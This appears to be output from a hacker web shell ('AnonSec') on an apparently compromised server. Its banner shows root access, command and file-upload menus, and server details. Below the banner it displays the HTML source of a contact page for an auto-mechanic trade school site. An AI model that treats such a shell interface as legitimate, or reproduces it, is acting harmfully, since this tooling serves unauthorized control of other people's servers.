|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../automechanictradeschools.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Contact Automechanictradeschools</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
.contact-hero {
background: linear-gradient(135deg, rgba(15,23,42,0.85), rgba(30,64,175,0.85)), url('https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80') center/cover;
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased bg-gray-50">
<nav class="bg-gray-900 fixed w-full z-50 top-0 border-b border-gray-800">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto p-4">
<a href="./" class="flex items-center space-x-3">
<div class="w-10 h-10 flex items-center justify-center">
<svg width="48" height="48" viewBox="0 0 48 48" xmlns="http://www.w3.org/2000/svg">
<defs>
<linearGradient id="grad-0b7aeef54c8ad56e58cdbd84c930ba03" x1="0%" y1="0%" x2="100%" y2="100%">
<stop offset="0%" style="stop-color:#a855f7;stop-opacity:1" />
<stop offset="100%" style="stop-color:#db2777;stop-opacity:1" />
</linearGradient>
</defs>
<rect x="2" y="2" width="44" height="44" rx="12" fill="url(#grad-0b7aeef54c8ad56e58cdbd84c930ba03)" />
<text x="24" y="30" font-family="Arial, sans-serif" font-size="19" font-weight="bold" fill="white" text-anchor="middle" dominant-baseline="central">AU</text>
</svg> </div>
<span class="self-center text-2xl font-bold text-white">
Automechanictradeschools </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-gray-400 rounded-lg md:hidden hover:bg-gray-800">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-medium flex flex-col md:flex-row md:space-x-8">
<li><a href="/Home</a></li>
<li><a href="about-us.php" class="block py-2 px-3 text-gray-300 hover:text-white transition-colors">About</a></li>
<li><a href="blog/" class="block py-2 px-3 text-gray-300 hover:text-white transition-colors">Blog</a></li>
<li>
<a href="contact.php" class="block py-2.5 px-6 text-white bg-gradient-to-r from-purple-600 to-pink-600 rounded-lg hover:shadow-lg transition-all font-semibold">Contact</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="contact-hero text-white py-24">
<div class="max-w-6xl mx-auto px-6 lg:px-12">
<div class="max-w-3xl space-y-6">
<div class="inline-flex items-center px-4 py-2 rounded-full bg-white/10 border border-white/20 text-sm tracking-wide">
<span class="w-2.5 h-2.5 rounded-full bg-emerald-400 mr-2"></span>
Always-on client success </div>
<div class="flex flex-wrap items-center gap-3">
<span class="px-4 py-1 rounded-full bg-white/10 border border-white/20 text-xs uppercase tracking-widest">Fast response</span>
</div>
<h1 class="text-4xl md:text-5xl font-bold leading-tight">Talk with Automechanictradeschools today</h1>
<p class="text-lg text-white/80">Share what you need and our senior team will follow up with a tailored plan.</p>
</div>
<div class="grid grid-cols-1 sm:grid-cols-3 gap-6 mt-12">
<div class="bg-white/5 border border-white/10 rounded-2xl p-5">
<div class="text-3xl font-semibold">32 minutes</div>
<div class="text-sm uppercase tracking-wide text-white/70 mt-1">Avg. reply time</div>
</div>
<div class="bg-white/5 border border-white/10 rounded-2xl p-5">
<div class="text-3xl font-semibold">5 offices</div>
<div class="text-sm uppercase tracking-wide text-white/70 mt-1">Support locations</div>
</div>
<div class="bg-white/5 border border-white/10 rounded-2xl p-5">
<div class="text-3xl font-semibold">98%</div>
<div class="text-sm uppercase tracking-wide text-white/70 mt-1">Client satisfaction</div>
</div>
</div>
</div>
</section>
<section class="bg-white py-20">
<div class="max-w-6xl mx-auto px-6 lg:px-12">
<div class="grid lg:grid-cols-3 gap-8">
<div class="lg:col-span-2 space-y-6">
<div class="p-6 rounded-2xl border border-gray-100 shadow-sm">
<p class="text-sm font-semibold text-purple-600 mb-2">Strategic discovery</p>
<p class="text-gray-600">Book a session with our lead strategists to outline goals, KPIs, and launch plans.</p>
</div>
<div class="p-6 rounded-2xl border border-gray-100 shadow-sm">
<p class="text-sm font-semibold text-purple-600 mb-2">Onboarding playbook</p>
<p class="text-gray-600">We ship a clear onboarding plan so your team knows exactly what comes next.</p>
</div>
<div class="p-6 rounded-2xl border border-gray-100 shadow-sm">
<p class="text-sm font-semibold text-purple-600 mb-2">Dedicated channel</p>
<p class="text-gray-600">Receive a private collaboration channel with daily status snapshots.</p>
</div>
</div>
<div class="bg-gray-900 text-white rounded-3xl p-8 flex flex-col space-y-6 shadow-2xl">
<div class="w-16 h-16 rounded-2xl bg-white/10 border border-white/20 flex items-center justify-center">
<svg width="48" height="48" viewBox="0 0 48 48" xmlns="http://www.w3.org/2000/svg">
<defs>
<linearGradient id="grad-0b7aeef54c8ad56e58cdbd84c930ba03" x1="0%" y1="0%" x2="100%" y2="100%">
<stop offset="0%" style="stop-color:#a855f7;stop-opacity:1" />
<stop offset="100%" style="stop-color:#db2777;stop-opacity:1" />
</linearGradient>
</defs>
<rect x="2" y="2" width="44" height="44" rx="12" fill="url(#grad-0b7aeef54c8ad56e58cdbd84c930ba03)" />
<text x="24" y="30" font-family="Arial, sans-serif" font-size="19" font-weight="bold" fill="white" text-anchor="middle" dominant-baseline="central">AU</text>
</svg> </div>
<div>
<p class="text-sm uppercase tracking-widest text-white/60 mb-2">Ready to collaborate</p>
<h2 class="text-3xl font-bold mb-4">Automechanictradeschools</h2>
<p class="text-white/70">Email or call us for immediate support. We respond within one business day.</p>
</div>
<div class="space-y-3 text-sm">
<div class="flex items-center justify-between">
<span class="text-white/70">Phone</span>
<span class="font-semibold">+1-323-954-6916</span>
</div>
<div class="flex items-center justify-between">
<span class="text-white/70">Email</span>
<span class="font-semibold">office@automechanictradeschools.com</span>
</div>
<div class="flex items-center justify-between">
<span class="text-white/70">Address</span>
<span class="font-semibold text-right">145 State Street, Milwaukee, WI 53202</span>
</div>
</div>
<a href="mailto:office@automechanictradeschools.com" class="inline-flex items-center justify-center px-5 py-3 rounded-2xl bg-white text-gray-900 font-semibold">
<i class="fas fa-paper-plane mr-2"></i>
Email the success desk </a>
</div>
</div>
</div>
</section>
<section class="bg-gray-50 py-12">
<div class="max-w-6xl mx-auto px-6 lg:px-12">
<section class="bg-white py-20" id="contact">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid lg:grid-cols-2 gap-12">
<div>
<div class="inline-block px-4 py-2 mb-6 bg-purple-100 text-purple-800 rounded-full text-sm font-semibold">
Contact Us
</div>
<h2 class="text-4xl font-extrabold text-gray-900 mb-4">Say Hello</h2>
<p class="text-xl text-gray-600 mb-8">We'd love to hear from you. Send us a message and we'll respond as soon as possible.</p>
<div class="space-y-6">
<div class="flex items-start space-x-4">
<div class="w-14 h-14 bg-gradient-to-br from-purple-500 to-pink-600 rounded-xl flex items-center justify-center flex-shrink-0">
<i class="fas fa-phone text-white text-xl"></i>
</div>
<div>
<h3 class="font-bold text-gray-900 mb-1">Phone</h3>
<p class="text-gray-600">+1-323-954-6916</p>
<p class="text-sm text-gray-500 mt-1">Mon-Fri from 8am to 5pm</p>
</div>
</div>
<div class="flex items-start space-x-4">
<div class="w-14 h-14 bg-gradient-to-br from-purple-500 to-pink-600 rounded-xl flex items-center justify-center flex-shrink-0">
<i class="fas fa-envelope text-white text-xl"></i>
</div>
<div>
<h3 class="font-bold text-gray-900 mb-1">Email</h3>
<p class="text-gray-600">office@automechanictradeschools.com</p>
<p class="text-sm text-gray-500 mt-1">We'll respond within 24 hours</p>
</div>
</div>
<div class="flex items-start space-x-4">
<div class="w-14 h-14 bg-gradient-to-br from-purple-500 to-pink-600 rounded-xl flex items-center justify-center flex-shrink-0">
<i class="fas fa-map-marker-alt text-white text-xl"></i>
</div>
<div>
<h3 class="font-bold text-gray-900 mb-1">Office</h3>
<p class="text-gray-600">145 State Street, Milwaukee, WI 53202</p>
<p class="text-sm text-gray-500 mt-1">Visit us during business hours</p>
</div>
</div>
</div>
</div>
<div>
<form action="#" class="bg-gradient-to-br from-gray-50 to-white p-8 rounded-3xl shadow-xl border border-gray-100">
<div class="space-y-6">
<div>
<label for="name" class="block mb-2 text-sm font-semibold text-gray-900">Full Name</label>
<input type="text" id="name" class="bg-white border border-gray-300 text-gray-900 text-sm rounded-xl focus:ring-purple-500 focus:border-purple-500 block w-full p-4" placeholder="John Doe" required>
</div>
<div>
<label for="email" class="block mb-2 text-sm font-semibold text-gray-900">Email Address</label>
<input type="email" id="email" class="bg-white border border-gray-300 text-gray-900 text-sm rounded-xl focus:ring-purple-500 focus:border-purple-500 block w-full p-4" placeholder="john@example.com" required>
</div>
<div>
<label for="phone" class="block mb-2 text-sm font-semibold text-gray-900">Phone Number</label>
<input type="tel" id="phone" class="bg-white border border-gray-300 text-gray-900 text-sm rounded-xl focus:ring-purple-500 focus:border-purple-500 block w-full p-4" placeholder="+1 (555) 000-0000">
</div>
<div>
<label for="message" class="block mb-2 text-sm font-semibold text-gray-900">Your Message</label>
<textarea id="message" rows="4" class="bg-white border border-gray-300 text-gray-900 text-sm rounded-xl focus:ring-purple-500 focus:border-purple-500 block w-full p-4" placeholder="Tell us how we can help..." required></textarea>
</div>
<button type="submit" class="w-full px-8 py-4 text-base font-semibold text-white bg-gradient-to-r from-purple-600 to-pink-600 rounded-xl hover:shadow-2xl hover:scale-105 transition-all">
<i class="fas fa-paper-plane mr-2"></i>
Send Message
</button>
</div>
</form>
</div>
</div>
</div>
</section>
</div>
</section>
<footer class="bg-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="flex flex-col md:flex-row justify-between items-start mb-12 gap-8">
<div class="flex-1">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-12 h-12 bg-gradient-to-br from-purple-500 to-pink-600 rounded-xl flex items-center justify-center shadow-md">
<span class="text-white font-bold text-xl">A</span>
</div>
<span class="text-2xl font-black text-gray-900">Automechanictradeschools</span>
</a>
<p class="text-gray-600 mb-6 max-w-sm">Building the future with innovative solutions and dedicated service.</p>
<div class="flex space-x-3">
<a href="#" class="w-10 h-10 bg-purple-50 hover:bg-purple-600 hover:text-white text-purple-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-10 h-10 bg-purple-50 hover:bg-purple-600 hover:text-white text-purple-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-10 h-10 bg-purple-50 hover:bg-purple-600 hover:text-white text-purple-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-10 h-10 bg-purple-50 hover:bg-purple-600 hover:text-white text-purple-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div class="grid grid-cols-2 md:grid-cols-4 gap-8 flex-1">
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Company</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="./" class="hover:text-purpleHome</a></li>
<li><a href="about-us.php" class="hover:text-purple-600 transition-colors text-sm">About</a></li>
<li><a href="contact.php" class="hover:text-purple-600 transition-colors text-sm">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Resources</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="blog/" class="hover:text-purple-600 transition-colors text-sm">Blog</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Legal</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="privacy.php" class="hover:text-purple-600 transition-colors text-sm">Privacy</a></li>
<li><a href="terms.php" class="hover:text-purple-600 transition-colors text-sm">Terms</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Support</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="contact.php" class="hover:text-purple-600 transition-colors text-sm">Help Center</a></li>
<li><a href="disclaimer.php" class="hover:text-purple-600 transition-colors text-sm">Disclaimer</a></li>
</ul>
</div>
</div>
</div>
<div class="border-t border-gray-200 pt-8">
<p class="text-gray-500 text-sm text-center">© 2026 Automechanictradeschools. All rights reserved.</p>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021